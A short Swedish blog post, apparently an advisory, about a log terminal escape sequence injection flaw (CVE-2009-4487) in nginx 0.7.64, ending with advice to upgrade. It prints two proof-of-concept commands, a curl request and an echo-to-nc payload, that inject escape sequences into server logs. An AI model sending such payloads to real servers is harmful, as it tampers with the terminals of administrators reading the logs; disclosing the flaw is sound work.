GSOC

Fick mail i dagarna om en ”Terminal Escape Sequence in Logs Command Injection Vulnerability” i nginx vilket var intressant, särskillt dÃ¥ exempelvis wordpress.com använder sig av nginx för lastbalansering.

Dock är det bara nginx 0.7.64 som är sårbar.

Exempel 1:

curl -kis http://www.example.com/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

Exempel 2:

echo -en ”GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d” > payload nc localhost 80 < payload

Det krävs även att användaren öppnar loggfilerna sedan i terminalen.

Lite kuriosa nedan:
CVE: CVE-2009-4487
Bugtraq ID: 37711

Lösning: Uppgradera din version av nginx